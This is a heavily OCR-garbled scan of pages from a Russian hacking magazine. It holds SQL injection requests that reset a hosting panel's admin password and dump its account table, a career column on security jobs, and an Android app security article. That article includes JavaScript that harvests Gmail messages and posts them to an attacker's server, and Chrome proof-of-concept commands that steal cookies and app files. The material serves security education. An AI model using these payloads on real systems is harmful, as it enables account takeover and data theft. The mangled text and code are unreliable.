40ехатр1е . сот&іпРЬопе=101&іпІап§;иа8е=еп&іпАсІсІге55=Ноте&— 
іпРо5Та1СосІе=101 

501-инъекция (СѴЕ-2012-5685). Уязвимым является параметр 
іпЕтаіІАсІсігезз. В данном случае инъекция затрагиваетоператор 
ОРОАТЕ, поэтомуатакующий может совершатьс данными в базе 
любые манипуляции. Например, сменить пароль стандартного 
пользователя гасітіп на равзѵѵогсі (5!4сіссЗЬ5аа765(і61(і8327сіеЬ88 
2с!991: 

ЬТТр : //192 . 168 . 1 . 100/ ?тосІи1е=тапа8е_с1іеп1:5&ас-1:іоп=^ 
УрсІаТеСІіепі: 

Р05Т /?тос1и1е=тапа8е_с1іепТ5&ас1:іоп=ирсІаТеС1іепТ НТТР/1.1 
Н05і: 192.168.182.128 

Ке-Регег : ЬТТр : //192 . 168 . 1 . 100/ ?тосІи1е=тапа8е_с1іеп1:5&4-« 
5Ьом=ЕсШ:&оТЬег=5 

Соокіе: РНР5Е55ІО=4гся0цоцссІр5-РЗе65зіиѵ5изсІ2 
Сопіепі-Туре: арр1ісаТіоп/х-ѵлуп^--Рогт-иг1епсос1есІ 
СопіепТ-Сеп^ТИ: 257 

іпСгоир=2&іпРаска8е=2&іпРи11Nате=ге5е11ег&іпЕтаі1АсIсIге55♦-^ 
=%27%2С+ 



ІМТЕКЫЕТЕХРІОКЕР 
ПОЗВОЛЯЕТ ОТСЛЕЖИВАТЬ 
МЕСТОПОЛОЖЕНИЕ КУРСОРА 
МЫШИ, ДАЖЕ ЕСЛИ ЕГО 
' ОКНО НЕАКТИВНО ИЛИ 
МИНИМИЗИРОВАНО 



ас_ра5$_ѵс%30%275-Р4сІссЗЬ5аа765с16іа8327сІеЬ882с-Р99%27%2С+ 

ас_и5ег_ѵс%30%272асІтіп%27+МНЕ8Е+ас_ісІ_рк%301%ЗВ--4-. 

&іпАсІсІге55=&іпРо5і:Со(іе= 

&іпРЬопе=101&іпНемРа55Ѵіі/огсІ=&іпЕпаЫесІ=1&іпС1іеп1:ІО=*-* 

5&іп5иЬтіТ=5аѵе 

Кроме этого, существует возможность просмотра данных 
в базе, используя подзапрос. Ибо поле, измененное оператором 
ІІРОАТЕ, отображается на странице. В следующем примере поле 
етаіі будет использоваться для хранения результата подзапроса. 
По правилам ЗОЕнельзя делатьЗЕЕЕСТ изтаблицы, куда делается 
ЕІРОАТЕ, для обхода этого будетсоздана временная таблица ^ип. 
Используя дгоир_сопсаІ, получим все колонки и строки: 

НТТр : //192 . 168 . 1 . 100/ ?тос1и1е=тапа§е_с1іепі:5&асТіоп=^ 
УрсІаТеСІіепІ: 

Р05Т /?тосІи1е=тапа§е_с1іепі:5&асТіоп=ирсІаТеС1іепТ НТТР/1.1 
НозТ: 192.168.1.100 

КеТегег : бТТр : //192 . 168 . 1 . 100/ ?тосІи1е=тапабе_с1іепТ5&»-' 
5Иом=ЕсІіі:&оТЬег=5 

Соокіе : РНР5Е55ІО=4гсц0цояссІр5^=Зе65 ^іиѵ5и ^гі2 
СопТепТ-Туре : арр1ісаТіоп/х-ѵллі/--Рогт-иг1епсосІесІ 
СопТепТ-ІепбТЬ: 335 

іпбгоир=2&іпРаска8е=2&іпЕи1ІМате=ге5е11ег&іпЕтаі1АсІсІге554-' 

=ге5е11ег% 

40ехатр1е . сот%27%2С+ас_етаі1_ѵс%30%285е1есТ+§гоир_сопсаТ*-^ 
%28ас_и5ег_ѵс%2С+ 

ас_ра55_ѵс%29+Тгот+%285е1ес1:+*+-Ргот+х__ассоипТ$%29+а5+«-' 

■Рип%29+мЬеге+ 

ас_ісІ_рк%30%275%27%ЗВ--&іпАсІсІге55=&іпРо5ТСосІе=&іпРЬопе=^ 

%2В44%281473%29+00 

+000&іпНемРа55мог(1=&іпЕпаЫесІ=1&іпС1іепТІО=5&іп5иЬтіТ=5аѵе 



Неавторизованный сброс пароля (СѴЕ-2012-5686). Фигурантом 
этой уязвимости является параметр гапботкеу, который недо- 
статочно «случаен». Атакующий, зная системное время на це- 
левом сервере, может подобрать этот параметр за достаточно 
малое количество запросов и сбросить пароль произвольному 
пользователю. Крометого, если атакующий в состоянии получить 
письмо о сбросе пароля для любого аккаунта в системе, то количе- 
ство запросовдля подбора гапботкеузначительносокращается. 
Уязвимый код находится в скрипте ./іпс/іпіЕіпс.рИр: 



38 $гапс1откеу = $Ьа1(гаісгоТіте()); 

46 $2с1ЬЬ->ехес("иР0АТЕ х_ассоипТз 5ЕТ ас_ге$еТІіа5Іі_і:х = «-« 
' " . $гапс1откеу . " ' МНЕКЕ ас_ісІ_рк=" . $ге5и1Т«-' 
[*ас_і(1_рк’] . 



50 $рИртаі1ег->ВосІу = "Ні " . $ге5и1Т[ ' ас__и$ег_ѵс ' ] . ", 

51 Ѵои ог 5отеЬосІу ргеТепсІіп§ То Ье уои баз гециезТесІ 

а раззмогсі гезеТ Ііпк То Ье зепТ -Рог уоиг меЬ ЬозТіп§ 
сопТгоІ рапеі 1о§іп аТ: " . сТг1_орТіопз::6еТ0рТіоп— 
(*ср_иг1') . " 

52 ІТ уои мізЬ То ргосеесі міТЬ ТЬе раззмогсі гезеТ оп «-• 
уоиг ассоипТ ріеазе изе ТЬіз Ііпк Ьеіом То Ье Такеп 
То ТЬе раззмогЬ гезеТ ра^е. 

53 ЬТТр://" . сТг1_орТіопз: :СеТОрТіоп( '2рапе1_сІотаіп' ) . «-< 
"/?гезеТкеу=" . $гапсІоткеу . " 

54 

2РапеІ<=10.0.1. 



Патча от разработчика пока не поступало, з: 



А 
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КОЛОНКА 
АЛЕКСЕЯ СИНЦОВА 



Алексей Синцов і(1е(сопги55іаШдтаіІ.сот) 




КОМУ 

НУЖНЫ 

ХАКЕРЫ? 



ТРИ ВАРИАНТА КАРЬЕРЫ ДЛЯ ЧЕЛОВЕКА 
С <^ПРАВИЛЬНЫМИ» НАВЫКАМИ 



Последнее время я все чаще 
слышу термины вроде «хаке- 
ры» и «ресерчеры». Куча ребят 
любят «взламывать», и это 
действительно увлекательный 
процесс. Но сегодняшняя колон- 
ка будет посвящена целевому 
применению подобных знаний 
с пользой — в каких профес- 
сиях это пригодится, насколько 
нужны и где востребованы люди 
с такими навыками. 



“ а самом деле ни для кого не секрет, 
и что термин «хакер» утратил четкое 

определение (да и имел ли когда-либо 

вообще?). Сейчас этим термином бросаются 
все, по поводу и без. Поэтому я взял на себя 
смелость немного разъяснить «кто» и «что». 
Будем исходить из того, что тебе интересна 
область ИБ сточки зрения ИТ-безопасности, 
причем практической и агрессивной. Какие 
же у тебя есть возможности и где ты можешь 
развить свой потенциал? На самом деле ответ 
будет такой — везде, главное — найти область 
применения себя. Но если ты хочешь «ломать», 
тебе нравится проводить атаки, а не просто 
говорить о них, то вот тебе список для раз- 
мышления... 



I ИССЛЕДОВАТЕЛЬ ИБІ 

Почти любая хакерская активность — это 
исследование. Немудрено, что если ты лю- 
бишь искать баги в системах, то тебе стоит 
подумать о будущем исследователя. В целом 
исследователь занимается поставленной 
задачей, например корпит над проблемами 
веб-безопасности (ломает веб) или исследует 
методы обхода ОЕР (эксплойт-дев). В этом 
большой плюс: ты занимаешься интересной 
тебе областью. Но также и минус — эта область 
заранее ограниченна. 

С другой стороны, так как ты не тратишь 
силы на другие проблемы, ты сосредоточен 
на своем векторе и можешь более успешно 
идти к цели. Например: «Мы компания, кото- 
рая специализируется на взломе холодиль- 
ников марки зил, у нас есть 0-дэй баги, и мы 
знаем много тонкостей разморозки ЗИЛа. 

У нас есть свой сканер — ЗИЛСкан» — со- 
средоточенность на одной теме или цели дает 
больший прорыв, но меньшую площадь. Так же 
и с направлениями — «Мы ломаем только веб». 
Как правило, это выбор энтузиастов — копате- 
лей какого-то одного направления. 

ТРЕБОВАНИЯ: 

• Уметь анализировать объекты и систему. 
Ценится умение по различным «внешним» 
деталям делать выводы о структуре и архи- 
тектуре системы, умение понимать суть. 

• Знать предметную область исследования. 

• База. Хороший исследователь должен об- 
ладать базой знаний о классах атак и суще- 



ствующих типах уязвимостей. Кроме того, 
должна быть база по предметной области. 




Требования, в общем-то, невелики, но силь- 
но зависят от области исследования, которая 
налагает дополнительные. Тем не менее тут, 
как мне кажется, минимальный порог вхож- 
дения. 
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Кому нужны хакеры? 







СПЕЦИАЛИСТ ПО ПРОВЕДЕНИЯМ! 
ТЕСТОВ НА ПРОНИКНОВЕНИЕ] 



Если ты любишь взламывать, то самое оче- 
видное решение — найти работу пентестера. 
Но надо понимать, что профессиональный 
пентестер — это больше, чем баг-хантер или 
«секурити ресерчер». Если ресерчер может 
быть ограничен в применяемых знаниях 
и скилах, например просто искать уязвимости 
в веб-приложениях, заниматься конкретной 
задачей под его области знания, то пентестер 
должен уметь все (пентестер включает в себя 
множество скилов исследователя). Он и веб 
ломает, и знает, что такое ОЕР и тонкости АЯР- 
зрооЛпд. В последнее время стало модным 
делить пентестеров по классам и собирать 
команды: тут у нас специалисты по вебу, тут 
сетевики, а там люди эксплойты под серви- 
сы тестируют и проверяют шелл-коды — это 
позволяет создать управляемую команду 
с полным покрытием задач, да и набрать 
таких специалистов легче, чем полноценных 
пентестеров. 

ТРЕБОВАНИЯ: 



лее гибок и полезен. Требуются пентестеры 
в основном в консалтинговые ИБ-компании, 
но на Западе также и в банки, и в просто круп- 
ные компании. 



[ИНЖЕНЕР 1ЙБІ] 

Все-таки главная задача индустрии с этой 
стороны — защита своих активов. Искать 
дыры и ломать — это весело, но не сильно 
поможет решить проблему ИБ в отдельно 
взятых компаниях. Поэтому им нужны ин- 
женеры, которые будут понимать, что и где 
надо залатывать. Естественно, что такой 
инженер должен иметь опыт и бэкграунд 
сточки зрения «хака» (инженер по ИБ 
включает в себя множество скилов пентесте- 
ра). Зачем? Затем, что такой инженер сразу 
скажет, что не так и как делать не стоит, 
кроме того, такие специалисты могут прово- 
дить экспресс-пентесты, анализ исходного 
кода, обучать разработчиков, проводить 
анализ конфигурации систем, расследовать 
инциденты, собеседовать с потенциальными 
исполнителями — теми же пентестерами 
(заказчик никогда не знает, насколько хорош, 
например, пентестер; выяснить это можно 
на собеседовании — нормальная практика, 
чтобы не получить некачественную работу). 

То же самое с интеграторами различных 
ИБ-решений — инженер скажет, так ли оно 
работает, как надо, там ли его хотят вставить 
и что и как мы хотим защитить. Более того, 
инженер — основная техническая единица, 
любое планирование того или иного действия 
с точки зрения ИБ проходит через инженера, 
где он отвечает за техчасть. 



• Уметь анализировать объекты и систему. 
(Денится умение по различным «внешним» 
деталям делать выводы о структуре и архи- 
тектуре системы, умение понимать суть. 

• Опыт эксплуатации различных систем. 
(Денится знакомство с различными пре- 
пятствиями и опыт их решения. Важно, 
что кандидат не только читал про 501і, 
но и понимает, как, например, работает 
бинарный поиск для ускорения перебора 
в слепой инъекции или использование 
еггог-Ьавесі-атак. 

• Знать инструментарий. Ценится знание 
и опыт использования существующих 
«хакерских» фреймворков, тулз и, главное, 
понимание сути их работы — это особенно 
важно. 

• База. Хороший пентестер должен обладать 
базой знаний не только о классах атак, 
уязвимостях — это очевидно, — но и об ар- 
хитектуре ОС, сетях, протоколах, крипто- 
графии и даже математике. 

• Уметь читать код, читать между строк 

в этом коде, а также писать код — некото- 
рые задачи важно автоматизировать. 

Тут перечислен минимальный набор. Чем 

шире спектр знаний пентестера — тем он бо- 



ТРЕБОВАНИЯ: 

• Уметь анализировать объекты и систему. 
Ценится умение делать выводы по раз- 
личным «внешним» деталям о структуре 
и архитектуре системы. Умение понимать 
суть. 

• База. Хороший инженер должен обладать 
серьезной базой знаний и разбираться 
не только в архитектуре ОС, сетях, про- 
токолах, но и в криптографии, математике 
и, что немаловажно, хакерских техниках, 
атаках, уязвимостях и так далее. 

• Знать методы защиты и нападения. Це- 
нится практический опыт эксплуатации 
и построения защищенных систем. 

• Понимать принципы разработки, уметь 
работать в команде с разработчиками. 

• Понимать принципы работы с распределен- 
ными системами, уметь работать в команде 
системных инженеров. 

• Уметь читать код, читать между строк 
в этом коде и писать код. 

В общем, это базовые требования, но они 
минимально допустимы, в отличие от случая 
с пентестером. На инженера могут только 
накидываться новые и новые требования. 



в зависимости от деятельности компании, 
тогда как с пентестера легко могут только 
сбрасываться задачи и требования. В среднем 
инженерная работа более сложная и не менее 
интересная, так как в 90% случаев полностью 
включает в себя пентестерскую и еще и рас- 
ширяет ее. Главное, такой инженер для круп- 
ных компаний, предоставляющих различный 
сервис, более полезен и гибок, чем просто 
консультант-пентестер или баг-хантер иссле- 
дователь. Поэтому инженеры нужны в крупные 
компании с развитым Р&О. 

ЕвыЩрЗ 

Как видишь, применять свои хакерские на- 
выки можно в хороших и полезных целях! Это 
востребовано. Лично мой выбор — это инжене- 
рия, так как в этой области я могу решать раз- 
носторонние задачи. При этом инженер может 
самостоятельно, при удачном позиционирова- 
нии внутри компании, заниматься тем, что ему 
нравится, — исследованием, пентестингом 
или построением архитектуры и организаци- 
ей защиты (иногда строить интереснее, чем 
ломать). Собственно, если ты любишь ломать, 
то в зависимости от твоего опыта и интересов 
у тебя есть выбор. Немного статистики по ва- 
кансиям с ипІ<есіІп: 

• ИССЛЕДОВАТЕЛЬ ИБ 
Вакансий: 15 

Компании: Соѵегіу, Ітрегѵа, ІВМ, ОЕІІ, РІМ, 
Баглзипд 

іі ПЕНТЕСТЕР 
Вакансий: 14 

Компании: Ѵегасосіе, Арріе, Огасіе Ресіега! 
Резегѵе Вапк о1 5ап Ргапсізсо 

• ИНЖЕНЕР 
Вакансий: -400 

Компании: боодіе, ѴМѵѵаге, Сізсо, МісгозоП, 
Оиа(сотт, Эипірег, ЫпкесКп, МогіКа 

Р. $. Учти, что у компании могут быть свои 
представления об обязанностях того или 
иного специалиста. Тут я разделил вакансии 
по типам на мой взгляд. И это может не совпа- 
дать с мнением тех, кто публикует и называет 
вакансии, так что все это запросто может быть 
перемешано. Главное — понять, что работы 
много, а специалистов с навыками «хакера» — 
мало! □□ 
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ВЗЛОМ 



Новые ошибки в веб-сервисах, приложениях и операционных 
системах — все это уже так привычно и знакомо. Подобные 
новости мы читаем каждый день. Но что странно; если взять 
мобильное направление, то здесь царит тишина. И если иногда 
проскакивают новости об уязвимостях в самих ОС, то никакого 
багтрака по мобильным приложениям нет. Почему? 



ВВЕДЕНИЕ 

Почта, календарь, список контактов, менед- 
жер паролей, сотни фотографий — все это хра- 
нится у нас на телефоне. Смартфон становится 
своеобразным ключиком ко всему: многие сер- 
висы привязывают номер телефона для воз- 
можности восстановления пароля. При этом 
мы по какой-то необъяснимой причине 
на подсознательном уровне считаем, что все 
содержимое смартфона априори находится 
в безопасности. Худшее, что может произойти, 
в глазах обычного обывателя — это потеря или 
кража девайса. Однако на этом список угроз 
не заканчивается. 

Мобильные приложения по сути своей мало 
чем отличаются от обычных. И глупо было бы 
говорить о том, что они более безопасны. На- 



против, мобильные разработчики не сильно 
запариваются насчет безопасности, расстав- 
ляя приоритеты в сторону функциональности 
и юзабилити. Программисты здесь еще не нау- 
чены горьким опытом и пока мало задумывают- 
ся о безопасности — главное, чтобы все хорошо 
работало и пользователи скачивали/покупали 
приложения. Поэтому нет ничего странного, 
что в огромном количестве приложений (в 
том числе банковских) кроются уязвимости — 
и выявляются они чаще всего простейшим 
анализом. Неудивительно, что безопасность 
мобильных приложений вызывает все больший 
интерес как среди злоумышленников, так 
и среди исследователей. Хороший пример: 
компания «Яндекс» в конце 2012 года добавила 
в конкурс «Охота за ошибками», помимо веб- 



сервисов, свои приложения для і05 и Апсігоісі. 

В нашей программе сегодня — разобраться 
с основными типами уязвимостей в мобиль- 
ных приложениях для мобильной платформы 
Апсігоісі. Но прежде — освоим матчасть. 

АМОРОГО-ПЙ^ЛОЖЕНИЕ ИЗНУТРИ 

Операционная система Апсігоісі устроена таким 
образом, что каждое приложение запускается 
под специальной виртуальной машиной Оаіѵік. 

Ее отличительная особенность — низкое энер- 
гопотребление, что хорошо подходит для АРМ- 
устройств. Программы для Апсігоісі пишутся 
на ^аѵа (с использованием внешних библиотек 
на других языках благодаря расширению МОК), 
однако стандартный байт-код не используется. 
Вместо этого Оаіѵік использует свой фор- 
мат — Цех. Обычные сіазв-файлы конвертиру- 
ются в сіех с помощью утилиты сіх, входящей 
в Апсігоісі 50К. 

Приложения для Апсігоісі распространя- 
ются в виде АРК-файлов, которые являются ^ 
исполняемыми 21Р-архивами. Внутри архива ® 

используется простая структура файлов: | 

• Директория МЕТА-ІМР: | 

• МАМІРЕ5Т.МР — файл-манифест; о 

• СЕРТ.Р5А — сертификат; о 

• СЕРТ.5Р — хеши файлов и ресурсов; © 



068 



ХАКЕР 02/169/2013 



Роботы ошибаются 




Пытаемся провести инжект и вызываем ошибку 501 



• Директория Г65— ресурсы, не содержащие- 
ся в ге$оигсе.аг5с; 

• Директория аззеіз — дополнительные 
файлы; 

• АпсігоісІМапі^езІ.хтІ — дополнительный 
файл-манифест; 

• сіаззез.сіех — скомпилированный файл 
для Оаіѵік; 

• гезоигсез.агзс — перекомпилированные 
ресурсы; 

• ІіЬ — не всегда есть, содержитбиблиотеки. 

Сточки зрения исследователя инте- 
рес представляют два файла — сіаззез. 
сіех и АпсігоісіМапі^езІ.хтІ. Декомпилировав 
сіаззез.сіех, можно получить исходный код 
приложения. А в файле АпсІгоісіМапі^езІ.хтІ 
хранится информация о настройках данного 
приложения, например доступные ему про- 
вайдеры (разрешение на чтение, отправку 5М5 
и так далее). 

Таким образом, алгоритм реверсинга боль- 
шинства приложений для Апсігоісі выглядит 
плюс-минус одинаково: 

1. РаспаковатьАРК-архив. 

2. Конвертировать с помощью утилиты с1ех2]аг 
файл сіаззез.сіех в с1аззез.]аг. 

3. Открыть с1аззез.]аг в Таѵа-декомпиляторе, 
например 30-6111. 

I ПАРА СЛОВ О безопасности] 

Безопасность ОС Апсігоісі находится на до- 
вольно высоком уровне. Как уже было 
сказано ранее, у каждого приложения есть 
файл АпсігоісІМапііезІ.хтІ, в котором про- 
писываются все необходимые приложению 
разрешения (их выставляет пользователь, 
когда устанавливает приложение). Если 
приложению не разрешить отправлять 5М5, 
то оно не сможет это делать. Такие разреше- 
ния контролируются на уровне ОС и регулиру- 
ются как раз с помощью этого файла. По этой 
причине вредоносное приложение можно 
определить по наличию странных прав, на- 
пример, эксплойт біпдегЬгеак не сработает, 
если у приложения нет прав на монтирование/ 
размонтирование 50-карты. Согласись, стран- 
но, если новая версия любимых Апдгу Вігсіз 
потребует такого. 



Помимо этого, у каждого приложения есть 
свой уникальный 10 и 610, а файлы самого при- 
ложения доступны только этому приложению 
(другими словами, имеют права -гѵѵ-гѵѵ — ). 

При старте каждого приложения запускает- 
ся своя ѴМ (Заѵа & Оаіѵік), но для эксплуатации 
многих уязвимостей, о которых речь пойдет 
далее, дополнительные права не требуются. 
Часто достаточно разрешения на работу с ин- 
тернетом, и тогда злоумышленник сможет в ре- 
жиме реального времени получать все данные. 
А если у него деструктивные наклонности, 
то и этого не надо. К примеру, достаточно уста- 
новить «живые» обои, не требующие никаких 
прав, зато удаляющие все твои заметки через 
501-инъекцию. 

I ИНСТРУМЕНТЫ ДЛЯ АНАЛИЗА] 

Как и в обычном реверсинге, программы-по- 
мощники разделяются на две категории: 
для статического и динамического анализа. 

СТАТИЧЕСКИЙ АНАЛИЗ 

Основной утилитой является сіех2]аг, которая 
входит в состав многих утилит, — о ней уже 
не раз упоминалось на страницах журнала, 
поэтому опустим подробности. Да и навыков 
особых она не требует, небольшой алгоритм 
декомпилирования приложения мы описа- 
ли в предыдущей главе. Некоторое время 
назад в Сети появилась компания со своим 
мегапродуктом, который «шифровал» твое 
приложение. На самом деле он использовал 
ошибку в утилите сіех2]аг, которую доволь- 
но оперативно исправили. Далее, получив 
обычный Заѵа-код, воспользуемся любым 
Заѵа-декомпилятором. Я предпочитаю два: 
30-61Л и ]ас1, графический и консольный. 

У графического есть небольшая проблема: не- 
которые куски кода он оставляет в виде байт- 
кода, поэтому приходится какие-то классы 
декомпилировать еще раз уже с помощью ]асі. 
Если такой алгоритм не сработал, придется 
работать на уровне зтаІі/ЬаскзглаІі-кода 
с помощью одноименных утилит. Ну и конечно, 
пригодится ЮА: начиная с версии 6.1, у нее по- 
явилась поддержка АРМ-архитектуры и рабо- 
тает распаковка АРК-файлов. Стоит отметить, 
плагин Апсігодиагсі для редактора 5иЫіппе 



Техі (Ыиѵ/ѴѴ5е0п2 І заменяет многие утилиты, 
описанные выше. В его арсенале имеются 
встроенные декомпиляторы как Заѵа-, так 
и 5глаІі-кода, конвертор ХМІ-файлов, напри- 
мер АпсІгоісІМапііезІ.хтІ, в обычный текстовый 
и многое другое. 

Помимо программ для реверсинга, в Сети 
есть утилита для сканирования приложе- 
ния на наличие уязвимостей — 5сапОгоісі. 
Последняя представляет собой небольшой 
скрипт на РиЬу, который является оберткой 
для утилит-декомпиляторов, а правила зада- 
ются в текстовом файле, поэтому без проблем 
всегда можно написать свои. Есть подробная 
статья по работе с ней и перевод: Ы!.Іѵ/ѴсіАЕіи . 

ДИНАМИЧЕСКИЙ АНАЛИЗ 

С динамическим анализом в Апсігоісі дело 
обстоит сложнее. По сути, это только Апсігоісі 
50К с набором утилит. С 50К могут работать 
три ІОЕ: Есіірзе, МеШеапз, Iп^еIIі^ ЮЕА. боодіе 
официально поддерживает плагин для Есіірзе, 
поэтому советую выбрать его. Хотя с выходом 
двенадцатой версии ЮЕА работа с Апсігоісі 
в этой среде разработки стала в разы при- 
ятней. 

Из 50К нам понадобятся: 

• асІЬ — основная утилита, отвечающая за об- 
мен информацией сустройством; 

• СІСІГЛ5 — официальная утилита для дебага, 
описание возможностей которой займет, 
наверно, целую статью; 

• Іодсаі — вывод лога, в котором будут видны 
все ошибки, входит в состав сісітБ. 

От пользователя требуется либо запустить 
эмулятор, либо кабелем подключить устрой- 
ство к компьютеру. Затем включить Есіірзе 
и открыть вкладку 00М5, в которой можно бу- 
дет наблюдать лог работы устройства, список 
процессов, файловый менеджер (его можно 
использовать как для скачивания файлов 
с устройства, так и закачивания), ну и эмули- 
ровать отправление 5М5 / координат 6Р5 или 
звонок. Но если запустить эмулятор и под- 
ключить больше одного устройства, следует 
подцепиться к нужному командой асіЬ соппесі. 
Получить список устройств можно с помощью 
команды асіЬ сіеѵісез. 

Относительно недавно появилась статья 
( Ьіі.Іѵ/и9рІІ5 І про подключение дсІЬ, но для это- 
го надо иметь устройство с правами гооі или 
отлаживать в эмуляторе. Но никто не мешает 
воспользоваться апсігоіс1-х86 или собрать свое 
ядро, например, с поддержкой сіігасе. 

Чтобы не скачивать все утилиты по одной, 
французские ресерчеры сделали виртуаль- 
ную машину для Апсігоісі-реверсера АРЕѵт. 

Она представляет собой ѴігіиаІВох-образ 
с ІІЬипІи и установленными утилитами, многие 
из которых мы рассмотрели выше, их останет- 
ся только обновить: 

• апсігодиагсі 

• апсігоісі 5сік/псік 

• аркіпзресіог 

• аркіооі 

• ахтіргіпіег 
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Находим уязвимый участок кода 

• (іех2]аг 

• сІгоісІЬох 

• сіесі 

• зтаІі/ЬакзтаІі 

Такая виртуальная машина особенно при- 
годится ѴѴіпсіоѵѵз-пользователям для компи- 
лирования бинарных эксплойтов с помощью 
Апсігоісі МОК либо Апсігоісі ОС. 

[КАКИЕ БЫВАЮТ УЯЗВИМОСТИІ 

На данный момент известны и эксплуатируют- 
ся уязвимости, знакомые тем, кто занимается 
пентестом веб-сервисов: 

• Х55 — «межсайтовый скриптинг», то есть 
выполнение произвольного ^аѵа5сгірС 

в данном случае в рамках приложения; 

• 0X55 — «универсальный межсайтовый 
скриптинг», выполнение ^аѵа5сгір^налюбой 
открытой странице; 

• 501-инъекции — возможность внедрения 
своего кода в 501-запрос; 

• 5роо^іпд — подмена ответов сервера. 

Далее рассмотрим каждую уязвимость. 

ТИП 1.Х55 В ПРИЛОЖЕНИИ 

Огромную опасность представляет Х55 в при- 
ложениях. Например, если в приложении 
с помощью компонента \Л/еЬѴіеѵѵ() включен 
^аѵа5сгір^, то мы можем выполнить вредонос- 
ный код, который позволит получить со смарт- 
фона приватные данные. В качестве примера 
можно рассмотреть нашумевшую в прошлом 
году уязвимость в приложении бтаіі под 
Апсігоісі. Суть уязвимости заключалась в сле- 
дующем. Если в приложении послать письмо 
с адреса "опІоа(і=ѵѵіпсІо\л/.ІосаІіоп=’Ыір:// 
доодІе.сот'"(азотесітп.сот, то можно было 
увидеть страницу боодіе в приложении бтаіі. 
На основе этого нетрудно написать ^5-код, 
который будет получать мыльники и посылать 
их нам на заготовленный сниффер. 

ѵаг -Сетр; 
ѵаг і = 0і 



ѵаг Ііагбе-І: = "Н^-^р;//5оте_с1отаіп.сот/.-' 

5оте_ЬапсІ1ег.рИр’’; 

уаг тісі = раг$еІп1:(сІоситеп-1:.4-і 

ее-СЕІетеп-СзВуТ а§Nате( ’ЧаЫе" ) [0] . ісі . «-> 

5иЬ5-Сгіп§(1)); 

ѵаг X = пем Аггау(тісі); 

•Рог (і = тісІ; і > 0; і = і-1) { 
етаіі = "т"+і; 

•Сетр = "сІа'Са»"+тісІ+" "+і+" ''+4-. 
епсосІеикІ(міпсІоы.§таі1.«-і 
6в'СМе55аееВосІу(еітіаі1)+"\п\п"+4-< 
міпсіом . §таі1 . деТАсІсІгезз (етаіі ) ) ; 
х[і] = пем ХМІН-СірКедиезііО; 
х[і] .ореп("Р05Т",Таг8еТ,1;гие); 
х[і] . 5еТКецие5‘1:НеасІег4-^ 
("Сопіеп-Ь-Іуре”, "аррИсаІіоп/4-1 
х-ыѵла--Рогт-иг1епсосІесІ"); 
х[і] .5епсІ(і:етр); 

} 

Таким образом, если ты найдешь Х55 
в приложении, то существует большой шанс 
получить данные. Однако не стоит забывать, 
что для этого должен использоваться компо- 
нент ѴѴеЬѴіеѵѵ и зеиаѵабсгіріЕпаЫесіІ). 

ТИП 2. 0X5$ И РНЕ:// 

Существует отдельный вид уязвимостей — 
СІХ55 ШпіѵегзаІ Сгозз 5і1е 5сгір1іпд). Этот 
тип уязвимостей специфичен для браузеров, 
так как позволяет выполнять ^аѵа5сгір^-код 
на любой своей открытой странице. Из «боль- 
шого» мира для примера можно вспомнить баг 
в Орега ( ЬіСІу/5Рс\л/ѵт І. А в качестве примера 
по теме нашей статьи возьмем 0-сіау, найден- 
ный Артёмом Чайкиным в мобильной версии 
браузера СЬготе (благодаря ему Артём, кста- 
ти, попал в Зал славы Гугла). Суть данной уяз- 
вимости проста — использование Эаѵабсгірі: 
в иРІтекущей вкладки. 

Приведу сразу РоС. Запускаем зЬеІІ 
на Апёгоіё-устройстве (используется эмулятор 
или реальный девайс — это неважно): 

зЬе11@апсІгоісІ:/ $ ат зіагі -п 4-^ 

сот . апсігоісі . сЬготе/сот . боо^Іе . апсігоісі . «-« 



5еагсІі: ")апс1 1=1-’(1) 



]апиагу, 2013 


5ип 


ѴѴеІсоте (о Оіаго! 




Об 






01Ю7РМ 


~ 0%3 Я Визіпезз 




ВІІПСІ 50и в приложении. Результат Ігие-запроса. 


1 і 


АН Епігіез Щ 

і 


Ь+ 




БеагсЬ: *’)апс1 1=0--' (0) 




1 ОІаго Ьаз ПО епігіез. 





ВІіпсі $01і. Результат !а1$е-запроса 

аррз.сИготе.ЗітрІеСІіготеАсііѵіІу -сі «-■ 

' ІтС'Ср : //МММ . §оо§1е . ги ' 

И у нас запускается СІ^готе с доодіе.ги в теку- 
щей вкладке. А теперь используем Заѵабсгірі 
внутри ОРІ: 

5Не11@апсІгоісІ:/ $ ат з-Саг-С -п 

сот . апсігоісі . сЬготе/сот . §оо§1е . апсігоісі . ♦-і 

аррз.сЬготе.БітрІеСИготеАсЬіѵі-Су -сІ 4-^ 

' Заѵазсгірі : а1ег-С(сІоситеп-С . соокіе) ’ 

И мы увидим кукис (ёоситепСсоокіе) сайта 
на текущей вкладке (в данном случае доодіе. 
ги). Или другой вариант: показать окно о том, 
что версия браузера устарела, предложив 
обновиться, перейдя по указанному адресу 
с заранее заготовленным зловредным содер- 
жанием. Вариантов много. 

Также можно запускать СІіготе через 
команду аёЬ зИеІІ. Тогда, например, последняя 
команда будет выглядеть так: 

асІЬ зИеІІ ат зІаг-С -п 4-^ 

сот . апсігоісі . сЬготе/сот . еоо§1е . апсігоісі . 4-^ 

аррз.сЬготе.ЗітрІеСИготеАсСіѵі'Су -сІ 4^ 

’ ^аѵа5сгір•С : а1ег-1:(сІоситеп^ . соокіе) ’ 

Теперь еще один интересный баг, опублико- 
ванный тем же исследователем. Как известно, 
файлы приложения доступны только самому 
приложению. Но разработчики СЬготе допу- 
стили использование протокола Ые://, и благо- 
даря этому мы можем получить файлы при- 
ложения и загрузить их на карточку с правами, 
позволяющими любому приложению открыть 
их. РоС выглядит следующим образом: 

5 Ье 11 @апсІгоісІ:/ $ ат зТагІ -п 4 ^ 
сот . апсігоісі . сЬготе/сот. апсігоісі . сЬготе . 4-1 
Маіп -СІ 'б1е:///с1а1:а/сІа'Са/сот. апсігоісі. 4-1 
сЬготе/арр_сЬготе/0е-Раи1Т/Соокіез ’ 

И в /зсІсагсІ/ОоѵѵпІоасІз/Соокіез.Ьіп мы 
увидим наши печеньки с правами «Для всех». 
Теперь любое приложение может прочитать 
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Роботы ошибаются 



/згогаде/зсіса 


гсІО/ОоѵпІсасі і ІЗ -Іа 












сосаі 63953 

СІГѴХГѴХГ-Х 


3 


гоос 


зсісагсі г 


4096 


Зер 


13 


23:34 




сігѵхгѵхг-х 


47 


гоос 


зсісагсі г 


4096 


Зер 


11 


17:30 




-ГѴ-ГѴ-Г-- 


1 


гоой 


зсісагсі г 


71849 


аиі 


15 


20:11 


.СасеЬоок 1572917119 . зрд 


-ГѴ-ГѴ-Г-- 


1 


гоос 


зсісагсі г 


0 


аиі 


19 


01:55 


5РЗдгС73.рагс 


-ГѴ-ГѴ-Г-- 


1 


